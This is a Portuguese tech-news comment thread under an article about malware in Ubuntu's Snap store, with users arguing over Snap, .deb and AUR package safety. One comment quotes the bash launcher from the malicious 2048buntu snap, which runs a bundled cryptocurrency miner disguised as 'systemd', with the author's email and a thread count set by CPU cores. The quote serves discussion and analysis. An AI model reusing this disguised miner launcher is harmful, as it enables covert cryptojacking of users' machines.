PplWare Mobile

Cuidado: A loja de apps do Ubuntu também tem malware


Pedro Simões

Apaixonado por tecnologia, encontro no Pplware a forma ideal de mostrar aos outros os meus conhecimentos e de partilhar tudo o que me interessa neste intrincado universo

Destaques PPLWARE

68 Respostas

  1. Carlos Costa says:

    Zero fontes?

  2. P says:

    Dizer que isto é malware, que é, mas dando a ideia que está ao nível de um trojan…
    Podiam ter reforçado a segurança dos pactotes snaps

  3. ze says:

    ah e tal, é seguro!

  4. CMatomic says:

    Ate parece que só existe o ubuntu no mundo GNU/Linux , mas descobriu-se o problema .
    “Cai assim por terra mais um mito do Linux e do Ubuntu, que garantiam a maior segurança das aplicações e da loja destas.”
    A loja de aplicações do ubuntu é responsabilidade da canonical , e não do kernel Linux ou do sistema GNU .
    Alias não é a primeira-vez tal acontece .

    • VaGNaroK says:

      Finalmente alguém com conhecimento e palavras louváveis a serem digitadas, ao que parece ter mais conhecimento que o próprio autor do artigo.

  5. arc says:

    Vejamos…

    1. “Todos reconhecem no Linux uma segurança elevada e até maior que nos restantes sistemas operativos. A sua comunidade tem um papel importante ao desenvolver este sistema e as suas aplicações de forma aberta.”

    Linux, NÃO é um sistema operativo!
    Sistemas Operativos em que incorporam o Kernel, são as distribuições de Linux, as quais seguem os seus formatos padronizados de empacotamento!!

    Uma vantagem desde já para os SO Open Source e para qualquer aplicação, em que este pode ser escrutinado de forma Livre, Directa, Imediata e Corrigido o mais Rapidamente possível.

    2. ” … tem-se tornado o padrão da indústria e está em várias outras distribuições, dada a forma simples como os programadores podem partilhar as suas apps, independentemente da plataforma.”

    O formato de empacotamento Snap, NÃO é padrão em NENHUMA distribuição de Linux. Uma coisa é poder ser usado…outra diferente é ser um PADRÃO.

    No caso especifico da distribuição Ubuntu Linux, o formato de empacotamento PADRÃO e como é um derivado do Debian Linux é o formato .deb e NÃO…Snap.

    3. “A questão é que estes são automáticos e limitam-se a validar a sua funcionalidade e a capacidade de ser instalada noutras distribuições, não sendo verificado o código de forma exaustiva.”

    Aí está a verdade a começar a ver a Luz!

    Contrariamente, ao que acontece, se fosse um pacote padronizado para as distribuições de Linux, OBRIGATORIAMENTE, tinha de passar pela auditoria de integridade desse mesmo pacote, neste caso no formato .deb, para ser colocado nos repositórios oficiais da distribuição em causa.

    O que se passa no caso da Canonical, é que deseja dar tamanhas facilidades aos utilizadores da sua distribuição Ubuntu Linux, que no caso especifico desta nova forma de empacotamento, NÃO está a olhar a meios, desvirtuando a integridade da sua distribuição.

    Mais uma razão para quem defende em que as distribuições de Linux, devem seguir os seus formatos de empacotamento PADRÃO, em detrimento de formatos de empacotamento “aligeirados”, aos quais NÃO existe controlo à data.

    Nenhuma distribuição de Linux, recomenda a instalação de pacotes Snap em detrimento da sua forma de empacotamento previamente estabelecida para o seu SO, esta é a VERDADE.

    E o mesmo pode vir a acontecer com o formato Flatpak…

    4. “A categorização de malware neste caso deve-se à presença de código e funcionalidades maliciosas sem que as mesmas estivessem anunciadas na descrição da app.”

    Em qual SO, as aplicações com malware, as quais são desconhecidas pelos utilizadores, se encontram descritas como tal, antes de serem instaladas?

    5. “Cai assim por terra mais um mito do Linux e do Ubuntu, que garantiam a maior segurança das aplicações e da loja destas.”

    Oura vez Linux?!?!

    A Canonical, que aprenda, NÃO queira “IMPOR”, um formato de empacotamento NOVO, para o qual ainda não tem equipa para controlar devidamente o lançamento para a comunidade de utilizadores Ubuntu, esses tipos de pacotes.

    Querem atingir o Nirvana, ainda vão parar no Limbo!!

    No entanto, não deixa de ser curioso, se a noticia for lida com a máxima atenção, que este Badware como é designada esta nova forma de malware, em que o seu autor denota uma “ligeira” falta de esforço, para disfarçar estas aplicações nocivas, na medida em que faz a inclusão de um endereço de e-mail codificado em que menciona um Ferrari (myfirstferrari@protonmail.com).

    Ver em…https://github.com/canonical-websites/snapcraft.io/issues/651#issuecomment-388546799

    #!/bin/bash

    currency=bcn
    name=2048buntu

    { # try
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com –$currency 1 -g
    } || { # catch
    cores=($(grep -c ^processor /proc/cpuinfo))

    if (( $cores < 4 )); then
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com –$currency 1
    else
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com –$currency 2
    fi
    }

    NOTA: vai ficar a dúvida, se pode ter sido a forma mais expedita para chamar a ATENÇÃO da Canonical, para um buraco no seu modelo de verificação do Snapcraft.

    Não deixa de ser curioso também, que as boas praticas de instalação de pacotes em distribuições de Linux, NÃO recomendem que as aplicações a serem integradas, devemos utilizar da máxima cautela, sobre o tipo de software a ser instalado e sobre quais os locais de onde se instala.

    Exemplo: PPAs, scripts de instalação compartilhado via GitHub, etc., etc.

    CURIOSO: também não deixa de ser verdade que este bundleware, utiliza a licença do MIT, que permite que o mesmo seja distribuído como software proprietário, sem que para isso seja obrigado a ser disponibilizado o código fonte, desde que os direitos de autor sejam mantidos, como acontece neste caso.

    Nunca usei Snap nem esses “pendericalhos” e NUNCA irei utilizar nas minhas distribuiçoes de Linux, pelo simples facto que NÂO existe uma verificaçao linha a linha de codigo suspeito, como acontece nos formatos de empacotamento padrao para as distribuiçoes de Linux.

    Assim e para terminar, uma das GRANDES vantagens de se utilizar uma distribuição de Linux, software Open Source e Free Software, é precisamente a forma que temos de poder auditar TUDO e no menor espaço de tempo, disponibilizar, alertar, para que a solução para o problema seja resolvido o mais rápido possível.

  6. Sandro says:

    Nada a fazer, a não ser reinventem a Internet, e legislem, sobre a mesma, com penalizações bem severas, e até fecho de sites, que infrinjam. Não é como o Facebook, que sai impune, e continua, fazendo o que quer. Parece-me que há aqui mãozinha dos Governos, protegendo, estas poucas vergonhas.

  7. cmariano says:

    Onde é que anda o techmanja do Danilo agora?!

  8. Joao Ptt says:

    Posso concluir por tanto que o ubuntu não é seguro… mas não faz mal, não o uso, por isso devo estar seguro.

    • Pérolas says:

      Qual é o seguríssimo sistemas que usas? Appl€ (LOL), Window$ (LOL)? Não nenhum sistema que seja 100% infalível, agora o que há é sistemas com menos incidências e mais seguros que outros! Uma das coisas piores do código-fechado (appl€ e window$) é o FACTO de conterem bugs que são explorados anos a fio e outros que tu nem sabes que existem e são explorados à ganância e tudo isto porque o código-fonte não pode ser validado! Um «risco na pintura» não é o mesmo que um «queijo suiço» chamado código-fechado.

    • Samuel says:

      Tens a certeza que estas seguro? Caso não saibas o linux continua a ser mais seguro que os outros sistemas operativos. Na apps stores aparecem todo tipo de apps mas como eu só uso Synaptic Pakage Manager (a primeira app store do mundo).

  9. sakura says:

    Pacotes Snap são executados em sandBox…. sim pode por uma maquina a minerar.. mas como uso fedora com Selinux sem a minha ordem e autorização especifica, duvido que “”contamine “” um bom gnu/linux.

  10. jedi says:

    Informem-se primeiro o que é e como funciona uma snap app. E já agora agora explicassem no artigo tambem qual a diferença entre um malware e minerar criptomoedas. 😉

  11. informado says:

    Linux Fedora 🙂 ahaha 🙂 Não há trojan, malware, virus .. nada!

  12. pia says:

    Ué, mas não era o Linux o sistema perfeito?? Que não tinha vírus e humilhava o Windows e Mac? Ora pois, tou a rir.

  13. sakura says:

    “”Ué, mas não era o Linux o sistema perfeito??””

    se usa uma distro vendida a “MS,Canonical$$$” ou made in ch o problema é teu.
    quem usa linux Gosta mesmo é de PURO OSS. ArchLinux ou uma distro com suporte valido REL,Fedora, e sim o selinux tem backdoors, mas a segurança tem um preço, não há almoços grátis.
    Se é seguro ……. Lol os outros são melhores.

  14. ademirt says:

    No Archlinux se utilizar o AUR package também há riscos como o SNAP.

    Aliás, quando se instala um pacote do AUR (yaourt -S xxxx) , o sistema já alerta:

    “Pacote sem suporte, potencialmente perigoso.”

    • arc says:

      @adermit, importa-se de nos elucidar a todos, com um exemplo prático, da sua máquina onde executa o Arch Linux?

      Portanto, para si, SEMPRE que se instala um pacote via AUR:

      “Aliás, quando se instala um pacote do AUR (yaourt -S xxxx) , o sistema já alerta:

      “Pacote sem suporte, potencialmente perigoso.” ”

      Sabe, eu gosto de ver para acreditar, mas só com exemplos reais.

      • ademirt says:

        Conforme documentação sobre pacote do Repositório de Usuário do Arch , também conhecido como AUR:

        https://wiki.archlinux.org/index.php/Arch_User_Repository_(Português)

        São totalmente não-oficiais e não foram examinados completamente, então eles devem ser usados por sua conta e risco.

        • Danilo says:

          O problema desse arc é que é defensor ferrenho do Arch Linux, até o nome dele “arc”, deve ser do “Arch”. Ridículo.

        • arc says:

          @adermit, NÃO RESPONDEU, COM VERDADE AO SEU COMENTÁRIO:

          “Aliás, quando se instala um pacote do AUR (yaourt -S xxxx) , o sistema já alerta:

          Pacote sem suporte, potencialmente perigoso.”

          EU gostava de ver, um exemplo PRATICO, REAL, OBJECTIVO, de tal afirmação, acontecer na sua máquina com Arch Linux, ou com um qualquer derivado de Arch Linux.

          Estou precisamente a falar dessa mensagem, e o OUTPUT de uma instalação de uma qualquer aplicação instalada via repositório AUR,…NUNCA será esse o OUTPUT:

          Aliás, quando se instala um pacote do AUR (yaourt -S xxxx) , o sistema já alerta:

          Pacote sem suporte, potencialmente perigoso.

          PERCEBEU, OU DESEJA QUE EU LHE FAÇA UM …DESENHO?!?!

          Meu caro, NÃO INSISTA:

          “São totalmente não-oficiais e não foram examinados completamente, então eles devem ser usados por sua conta e risco.”

          POIS, mas isso é totalmente diferente do OUTPUT, como você deu a entender.

          Isso, é um ADVERTÊNCIA existente na documentação do AUR…e essa ADVERTÊNCIA ….NÃO APARECE EM CASO ALGUM, quando se instala qualquer pacote via repositório AUR!!!!

          MAS EU VOU DAR, o EXEMPLO, para PROVAR QUE VOCÊ….MENTIU!!!:

          [arc@zeus-orbital ~]$ yaourt -S pacui
          [sudo] password for arc:
          a resolver dependências…
          a procurar pacotes em conflito…

          Pacotes (2) fzf-0.17.3-2 pacui-1.10.2-1

          Tamanho Total Instalado: 3,10 MiB

          :: Continuar a instalação? [S/n]
          (2/2) a verificar chaves no chaveiro [######################] 100%
          (2/2) a verificar integridade dos pacotes [######################] 100%
          (2/2) a carregar ficheiros dos pacotes [######################] 100%
          (2/2) a verificar conflitos em ficheiros [######################] 100%
          (2/2) a verificar espaço disponível no disco [######################] 100%
          :: A processar modificações do pacote…
          (1/2) a instalar fzf [######################] 100%
          Dependências opcionais para fzf
          fish: fish keybindings
          tmux: fzf-tmux script for launching fzf in a tmux pane
          vim: plugin
          zsh: zsh keybindings [instalado]
          (2/2) a instalar pacui [######################] 100%
          Dependências opcionais para pacui
          pacaur: Needed for AUR support. [instalado]
          yaourt: Needed for AUR support. [instalado]
          yay: Needed for AUR support.
          pikaur: Needed for AUR support.
          trizen: Needed for AUR support.
          pacman-mirrors: Needed for Arch Linux mirror support [instalado]
          reflector: Needed for Arch Linux mirror support
          downgrade: Needed for hidden “downgrade” option.
          :: A correr os hooks de pós-instalação…
          (1/1) Arming ConditionNeedsUpdate…
          [arc@zeus-orbital ~]$

          Este é o OUTPUT…TOTAL da instalação de um pacote em Arch Linux, via repositório AUR, com o yaourt.

          Está PROVADO, que o que AFIRMOU (Aliás, quando se instala um pacote do AUR (yaourt -S xxxx) , o sistema já alerta:

          Pacote sem suporte, potencialmente perigoso.”

          ONDE ESTÁ ESSE TAL…ALERTA NO MOMENTO DE INSTALAÇÃO OU NO FINALIZAÇÃO DESSA INSTALAÇÃO?!?!?

          • Wilber says:

            Isso não acontece ao se instalar o Google Chrome via AUR. Sempre pede pra editar o PKGBUILD e não sei mais o que… Bem chatinho, inclusive eu utilizo o Pamac, é bem mais bonito que fica digitando comandos numa tela preta.

          • ademirt says:

            Faça aí no seu Arch –> yaourt -S google-chrome

            https://youtu.be/efzh-emcn3I?t=423

          • Wilber says:

            Prefiro utilizar a GUI (Pamac) que usar o terminal, é mais prático e rápido que ter que dá um monte de comandos e “sim”, “não”, “sim”, “não” só pra confirmar uma mera instalação. Parece o ruindows com next, next, install, rsrsrsrs.

          • Wilber says:

            Muito complicado, por exemplo, instalar Vivaldi via yaourt.

            Pede pra editar o PKGBUILD
            vivaldi 1.15.1147.42-1 (2018-05-14 14:21)
            ( Pacote sem suporte: Potencialmente perigoso ! )
            ==> Editar PKGBUILD ? [S/n] (“A” para abortar)

            Depois pede pra compilar o pacote
            ==> Continuar a compilação de vivaldi ? [S/n]

            Depois ainda pede mais coisa, custa digitar um só comando e instalar de uma vez? Quem é novato vai ficar perdidinho usando o yaourt. Melhor usar o Pamac, pois até mesmo o Octopi é chato na hora de confirmar a instalação do pacote, faz o mesmo processo via terminal.

    • arc says:

      @ademirt, isso é um falso positivo mesmo. Sem impacto no SO.
      Não existem reports de problemas ao nivel de impacto no sistema.

    • arc says:

      @adermit, mesmo por desconfiança, nao deixa de ser interessante a informação do output.
      Fica a advertência, para quem não confiar…não instalar.
      Como disse e escrevi, NÃO tive até ao momento, qualquer problema.
      No entanto, NÃO quer dizer que não possa existir, contudo dá sempre a possibilidade de abortar e além do mais, permite verificar em tempo real, possíveis problemas, algo que outros instaladores de pacotes em vários SOs, não dão oportunidade.

      • ademirt says:

        Estranho @arc,

        Você postou um exemplo de um output para provar que eu menti e ainda
        escreveu:


        Isso, é um ADVERTÊNCIA existente na documentação do AUR…e essa ADVERTÊNCIA ….NÃO APARECE EM CASO ALGUM, quando se instala qualquer pacote via repositório AUR!!!!

        Você fez no seu arch: yaourt – S google-chrome ???????????

        Apareceu o alerta ? em vermelho piscando ??? talvez você não percebeu.
        Acho que esse alerta deveria estar com letras maiores. Vou sugerir para a comunidade o Arch.

        Faz o yaourt em outros pacotes, tem muitos, por exemplo: spotify, linux-zen, sublime-text.

        Falso positivo ?!?!? Como você é ingênuo.

        Vou citar um trecho da documentação sobre o AUR :
        https://wiki.archlinux.org/index.php/Arch_User_Repository_(Português)

        ” … são totalmente não-oficiais e não foram examinados completamente, então eles devem ser usados por sua conta e risco. ”

        Atente-se a este detalhe: não foram examinados completamente.

        Sabe por que pode haver riscos quando for instalar um pacote do repositório AUR ?

        Eu posso disponibilizar um driver, um editor, um jogo, ou qualquer outro tipo de programa no repositório AUR, e junto com este pacote um malware, por exemplo um minerador.

        Muita atenção aqui:
        Não são examinados completamente, conforme escrito na documentação do AUR, certo ?

        E aí, quando uma pessoa por exemplo você, for tentar fazer:
        yaourt -S EDITOR_DO_ADEMIRT__PODE_CONFIAR

        Vai instalar o editor e executar o meu script malicioso.

  15. arc says:

    @Wilber, PKGBUILDs apesar de serem “simples scripts” de shell, são bem mais complexos do que pode parecer e fazem a interacção com o makepkg.

    Veja sempre o AUR, como sendo um repositório de PPAs., sempre será o seu ultimo recurso!!!

    • Wilber says:

      Arc vc é muito inteligente , poderia me dizer se é seguro baixar o pacote dropbox da AUR?
      Só tem ele na AUR
      https://aur.archlinux.org/packages/dropbox

    • ademirt says:

      @Wilber, também estou curioso.

      @arc, até o momento você se baseou no:

      [arc@zeus-orbital ~]$ yaourt -S pacui

      Quando você provou colocando um output e afirmando que não tem riscos.

      Lembre-se, que você afirmou que:

      ” …. Isso, é um ADVERTÊNCIA existente na documentação do AUR…e essa ADVERTÊNCIA ….NÃO APARECE EM CASO ALGUM, quando se instala qualquer pacote via repositório AUR!!!! … ”

      E a package que está no AUR, –> teamviewer

  16. , says:

    @Wibert e ademirt…

    Realmente, está a aparecer a mensagem no yaourt “Pacote incompatível: Potencialmente perigoso!”
    em alguns pacotes e corresponde à VERDADE.
    Todavia isso em nada afecta a integridade do sistema.

    Por exemplo, se forem instalar essas aplicaçoes via pacman, NÃO existe essa Informação.
    Se forem instalar essas mesmas aplicaçoes via pacli ou pacui, NÃO existe essa informãção.

    Se forem verificar o forum do Arch Linux, queiram por favor pesquisar por PROBLEMAS de falta de SEGURANÇA

  17. arc says:

    …continuando…

    Se forem verificar o forum do Arch Linux, queiram por favor pesquisar por PROBLEMAS de falta de SEGURANÇA, NÃO existem relatos sobre IMPLICAÇÕES DE SEGURANÇA no SO.

    Não acham estranho, o yaourt reportar em alguns pacotes essa mesma mensagem, e nas restantes aplicações que permitem a instalação de pacotes do AUR, como seja o caso do Pacli e do Pacui, que são wrappers interactivos para o pacman e para o yaourt?

  18. arc says:

    @Wilbert e ademirt….ora queiram ver onde são apresentados os problemas de aplicações relacionadas com SEGURANÇA….https://security.archlinux.org/

    E agora?

    • ademirt says:

      Não tem nada informando sobre o Dropbox, Sublime Text, Andoid Studio, Teamview, etcher, vivaldi.. e outros pacotes..

      Vou ser mais simples para você entender:

      O AUR não é o problema.

      O problema é: qualquer pessoa pode disponibilizar no repositório aur algum pacote contendo malware, pois estes pacotes não são examinados oficialmente.

      Eu também uso archlinux e ubuntu, mas parece que os Linux-lovers usam Antolhos.

  19. arc says:

    @ademirt

    Primeiro, EU não uso Manjaro, e SIM… Arch Linux.
    Mas para este caso, NÃO interessada.
    Estamos a conversar sobre o AUR e este é transversal ao Arch e a todos os derivados do Arch.

    “Não tem nada informando sobre o Dropbox, Sublime Text, Andoid Studio, Teamview,
    etcher, vivaldi.. e outros pacotes..”

    TEM pois!
    Índice de Popularidade, Votação, etc., e MUITO importante…os COMENTÁRIOS sobre a aplicação.

    “O AUR não é o problema.”

    Claro que o AUR, é o PROBLEMA. Sendo o local onde são alocadas as aplicações da comunidade que realizam o envio das suas aplicações…É o PROBLEMA!!

    “O problema é: qualquer pessoa pode disponibilizar no repositório aur algum pacote
    contendo malware, pois estes pacotes não são examinados oficialmente.”

    A possibilidade pode existir sempre, mas será mesmo que essa aplicação ou conjunto de aplicações vai ser disponibilizada, para utilização comunitária?
    Mesmo no AUR, os Trusted Users, realizam auditoria às aplicações, e isso está descrito
    nas guidelines do AUR.

    Ler…https://wiki.archlinux.org/index.php/AUR_Trusted_User_Guidelines

    No entanto, NADA é INFALÍVEL como sabemos, e uma das vantagens é que em ultima instância quem manda é o USER!

    Mas também NÃO vejo o problema, em caso de “MEDO”, nada como ir às sources
    (desde que disponível)…download, descompactar, ler o readme, procedimentos
    para compilaçao e instalar.

    É assim que EU faço, quando DESCONFIO de algo.

    NÃO existem sources, NAO À INSTALAÇAO!!!

    Além do mais, NÃO é estranho uma aplicação como o yaourt, estar descontinuado desde 2017-07-19 20:22!?!?!

    https://aur.archlinux.org/packages/yaourt/

    Além do mais, NÃO é estranho uma aplicação como o packer, estar descontinuado desde 2015-08-08 14:16!?!?!

    https://aur.archlinux.org/packages/packer/

    Mas se existe perigo, o qual é POSSÍVEL, então porque razão o pacman, aplicação que
    também “comunica” com o AUR, não informa desse facto, na opção DETALHES, quando se está a instalar via AUR?

    E também NÃO deixa de ser VERDADE, que o AUR, NÃO se encontra disponível por defeito. Por alguma coisa dever ser, NÃO?

    Certamente, é o user que o coloca disponivel, VERDADE?

    Se o coloca disponível, porque NÃO vai ler a documentação e as seus POTENCIAIS PERIGOS, para o SO?

    Como da mesma forma, em Debian e derivados, NÃ existem PPAs, quem os coloca é o…!!!

    Claro que Arch Linux, NÃO é para TODOS e a “FARTURA” das facilidades de algumas distribuições em querem agradar a tudo e a todos, por vezes trás MUITOS PROBLEMAS e depois culpam as DISTRIBUIÇÕES, os formatos de empacotamento, etc.

    Então ainda trás mais PROBLEMAS, aos utilizadores do CLICK -> NEXT CLICK -> NEXT!!

    Então, se INFRINGEM as boas praticas, disponibilizadas pela distribuição, se NÃO lerem a documentação, se não possuem conhecimentos básicos para a resolução de problemas, estão á espera do que?

    PROBLEMAS, nunca vão faltar,seja em que software for ou SO, sejam eles fechados ou Open Source.

    Nos Open Source, ainda os podemos analisar, reportar o bug, nós mesmos arranjar o problema localmente, etc.

    Portanto, o PROBLEMA ou o NÃO PROBLEMA, é SEMPRE o UTILIZADOR.

    • ademirt says:

      @arc, eu também uso o archlinux (puro) e o ubuntu.

      Sabe o que é Antolhos? pois parece que os linux-lovers usam isto.
      Dica: antolhos não é distribuição linux.

      Desde o início eu havia escrito: No Archlinux se utilizar o AUR package também há riscos como o SNAP.

      Porém VOCÊ discordou, veja o que você escreveu:

      arc 18 de Maio de 2018 às 09:07

      @adermit, NÃO RESPONDEU, COM VERDADE AO SEU COMENTÁRIO:

      “Aliás, quando se instala um pacote do AUR (yaourt -S xxxx) , o sistema já alerta:

      Pacote sem suporte, potencialmente perigoso.”

      EU gostava de ver, um exemplo PRATICO, REAL, OBJECTIVO, de tal afirmação, acontecer na sua máquina com Arch Linux, ou com um qualquer derivado de Arch Linux.

      Estou precisamente a falar dessa mensagem, e o OUTPUT de uma instalação de uma qualquer aplicação instalada via repositório AUR,…NUNCA será esse o OUTPUT:

      Aliás, quando se instala um pacote do AUR (yaourt -S xxxx) , o sistema já alerta:

      Pacote sem suporte, potencialmente perigoso.

      PERCEBEU, OU DESEJA QUE EU LHE FAÇA UM …DESENHO?!?!

      Meu caro, NÃO INSISTA:

      “São totalmente não-oficiais e não foram examinados completamente, então eles devem ser usados por sua conta e risco.”

      POIS, mas isso é totalmente diferente do OUTPUT, como você deu a entender.

      Isso, é um ADVERTÊNCIA existente na documentação do AUR…e essa ADVERTÊNCIA ….NÃO APARECE EM CASO ALGUM, quando se instala qualquer pacote via repositório AUR!!!!

      MAS EU VOU DAR, o EXEMPLO, para PROVAR QUE VOCÊ….MENTIU!!!:

      [arc@zeus-orbital ~]$ yaourt -S pacui
      [sudo] password for arc:
      a resolver dependências…
      a procurar pacotes em conflito…

      Pacotes (2) fzf-0.17.3-2 pacui-1.10.2-1

      Tamanho Total Instalado: 3,10 MiB

      :: Continuar a instalação? [S/n]
      (2/2) a verificar chaves no chaveiro [######################] 100%
      (2/2) a verificar integridade dos pacotes [######################] 100%
      (2/2) a carregar ficheiros dos pacotes [######################] 100%
      (2/2) a verificar conflitos em ficheiros [######################] 100%
      (2/2) a verificar espaço disponível no disco [######################] 100%
      :: A processar modificações do pacote…
      (1/2) a instalar fzf [######################] 100%
      Dependências opcionais para fzf
      fish: fish keybindings
      tmux: fzf-tmux script for launching fzf in a tmux pane
      vim: plugin
      zsh: zsh keybindings [instalado]
      (2/2) a instalar pacui [######################] 100%
      Dependências opcionais para pacui
      pacaur: Needed for AUR support. [instalado]
      yaourt: Needed for AUR support. [instalado]
      yay: Needed for AUR support.
      pikaur: Needed for AUR support.
      trizen: Needed for AUR support.
      pacman-mirrors: Needed for Arch Linux mirror support [instalado]
      reflector: Needed for Arch Linux mirror support
      downgrade: Needed for hidden “downgrade” option.
      :: A correr os hooks de pós-instalação…
      (1/1) Arming ConditionNeedsUpdate…
      [arc@zeus-orbital ~]$

      Este é o OUTPUT…TOTAL da instalação de um pacote em Arch Linux, via repositório AUR, com o yaourt.

      Está PROVADO, que o que AFIRMOU (Aliás, quando se instala um pacote do AUR (yaourt -S xxxx) , o sistema já alerta:

      Pacote sem suporte, potencialmente perigoso.”

      ONDE ESTÁ ESSE TAL…ALERTA NO MOMENTO DE INSTALAÇÃO OU NO FINALIZAÇÃO DESSA INSTALAÇÃO?!?!?

Deixe uma resposta

O seu endereço de email não será publicado.

You may use these HTML tags and attributes: <a href="" title="" rel=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

*

Aviso: Todo e qualquer texto publicado na internet através deste sistema não reflete, necessariamente, a opinião deste site ou do(s) seu(s) autor(es). Os comentários publicados através deste sistema são de exclusiva e integral responsabilidade e autoria dos leitores que dele fizerem uso. A administração deste site reserva-se, desde já, no direito de excluir comentários e textos que julgar ofensivos, difamatórios, caluniosos, preconceituosos ou de alguma forma prejudiciais a terceiros. Textos de caráter promocional ou inseridos no sistema sem a devida identificação do seu autor (nome completo e endereço válido de email) também poderão ser excluídos.